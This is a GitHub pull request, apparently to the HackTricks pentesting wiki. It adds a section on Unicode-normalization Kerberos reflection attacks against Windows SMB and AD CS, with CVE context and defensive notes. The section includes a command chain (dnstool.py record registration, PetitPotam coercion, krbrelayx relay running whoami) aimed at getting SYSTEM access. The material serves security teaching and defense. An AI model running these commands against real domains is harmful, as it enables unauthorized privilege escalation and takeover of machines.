Skip to content

Bypassing Windows authentication reflection mitigations for ... #2187

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
carlospolop wants to merge 1 commit into
base: master
Choose a base branch
from
+59 −1
Open

Bypassing Windows authentication reflection mitigations for ... #2187

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
60 changes: 59 additions & 1 deletion ...pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -253,6 +253,61 @@ For detailed info about this attack check:
4. **Ticket source not already used:** you win the race before the real packet hits or block it entirely; otherwise the server’s replay cache fires Event 4649.
5. You need to somehow be able to perform a **MitM in the communication** maybe being part of the DNSAmins group to modify the DNS of the domain or being able to change the HOST file of the victim.

### Unicode-normalization Kerberos reflection (2025-2026)

Synacktiv documented a **new Kerberos coercion/relay primitive** that bypassed the first SMB reflection mitigations by abusing **inconsistent Unicode normalization** across Windows DNS, Kerberos/SPN lookup, and SMB ticket acceptance.

- The attacker needs a way to **register AD-integrated DNS records** and **coerce machine authentication** (`PetitPotam`, DFSCoerce, etc.).
- The crafted target name must be:
- **Different enough** from the victim hostname/FQDN that `DnsCache` does **not** treat it as "self", so a DNS query is emitted.
- **Equivalent enough** during DC-side SPN lookup that the TGS request resolves to the **real machine account SPN**.
- This was achieved by combining:
- a **Unicode hostname lookalike** such as replacing `R` in `SRV1` with a Unicode equivalent so `CompareStringW(..., NORM_IGNORECASE)` no longer returns equal on the client side
- **Unicode dot equivalents** in the FQDN so the DC-side SPN search key still collides with the victim FQDN SPN set

Why it works:

- `DnsCache` self-name checks use `CompareStringW` with only **`NORM_IGNORECASE`**.
- SPN lookups in AD ultimately depend on **ESE/NTDS search keys** derived from `LCMapStringEx(..., 0x31403)` (`LCMAP_SORTKEY`, `NORM_IGNORECASE`, `NORM_IGNOREKANATYPE`, `NORM_IGNORENONSPACE`, `NORM_IGNOREWIDTH`, `SORT_STRINGSORT`).
- Therefore, two strings can be **different for client-side self-comparison** but still **collide during SPN lookup** on the DC.
- SMB then accepts the relayed AP-REQ as long as the service ticket decrypts under the same machine account key and the local-auth checks are otherwise satisfied.

Practical constraints and workflow:

1. A pure hostname variant tends to fail because **LDAP/DNS uniqueness checks** can hit the same normalized collision and reject the record as already existing.
2. The practical workaround is to register a **crafted FQDN** whose DNS label passes uniqueness checks but whose **constructed SPN** still collides with the victim machine SPNs.
3. Coerce the victim to authenticate to that crafted name, receive the **Kerberos AP-REQ** on the relay box, and relay it to a service on the victim or another service bound to the same machine account.
4. Some relay tooling may need a **small patch** to stop enforcing strict ASCII/hostname equality on the relayed target name because the ticket `sname` can contain Unicode.

Representative chain:

```bash
# 1. Register crafted ADIDNS record pointing to attacker
dnstool.py -u 'DOMAIN\\user' -p 'Passw0rd!' -r '<unicode-fqdn>' -d <attacker-ip> <dc>

# 2. Coerce machine auth to the crafted name
PetitPotam.py -u user -p 'Passw0rd!' '<unicode-fqdn>' <victim-fqdn>

# 3. Relay the Kerberos AP-REQ
krbrelayx.py -t smb://<victim-fqdn> -c whoami
```

Impact and adaptations:

- **Pre-October 2025 SMB reflection**: this yielded **authenticated SYSTEM RCE** from a standard domain user by reflecting the victim's Kerberos auth back to its own SMB service.
- **After CVE-2025-58726**: SMB added a **local-source-IP requirement** for loopback-auth sessions, which killed the remote SMB reflection path.
- **LPE variant (CVE-2026-26128)**: if you already have code execution on the victim, use a **local forwarder / reverse SOCKS** so the final SMB session originates from a **local address** while still relaying the coerced AP-REQ. This converts the primitive into **SYSTEM local privilege escalation**.
- **Other protocols still matter**: SMB-specific hardening does **not** kill Kerberos relay as a class. HTTP services without integrity / CBT remain strong targets, notably:
- **AD CS Web Enrollment** (`http://<ca>/certsrv/certfnsh.asp`) to obtain a machine certificate
- **SCCM AdminService** to perform privileged SCCM actions
- likely any service that accepts Kerberos and does **not** enforce signing, EPA, or channel binding

Defensive notes:

- **Loopback SMB signing** is now the important default mitigation. Newer systems enforce signing for local SMB connections through `HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters\RequireSecuritySignatureForLoopback`.
- Treat **ADIDNS write access** as a relay primitive, not just a DNS issue.
- For web targets, disable legacy HTTP enrollment when possible and enforce **EPA / CBT / signing** wherever the protocol supports it.

### Kerberos Relay Steps

- 3.1 **Recon the host**
Expand Down Expand Up @@ -351,6 +406,9 @@ You now own **NT AUTHORITY\SYSTEM**.
- [Microsoft – WSUS deprecation announcement](https://techcommunity.microsoft.com/blog/windows-itpro-blog/windows-server-update-services-wsus-deprecation/4250436)
- [RelayKing v1.0](https://github.com/depthsecurity/RelayKing-Depth)
- [Depth Security – Introducing RelayKing: Relay to Royalty](https://www.depthsecurity.com/blog/introducing-relayking-relay-to-royalty/)
- [Synacktiv - Bypassing Windows authentication reflection mitigations for SYSTEM shells - Part 2](https://www.synacktiv.com/en/publications/bypassing-windows-authentication-reflection-mitigations-for-system-shells-part.html)
- [Microsoft Learn - LCMapStringEx function](https://learn.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-lcmapstringex)
- [Microsoft Learn - CompareStringW function](https://learn.microsoft.com/en-us/windows/win32/api/stringapiset/nf-stringapiset-comparestringw)
- [Semperis - Exploiting Ghost SPNs and Kerberos Reflection for SMB Server Privilege Elevation](https://www.semperis.com/blog/exploiting-ghost-spns-and-kerberos-reflection-for-smb-server-privilege-elevation/)

{{#include ../../banners/hacktricks-training.md}}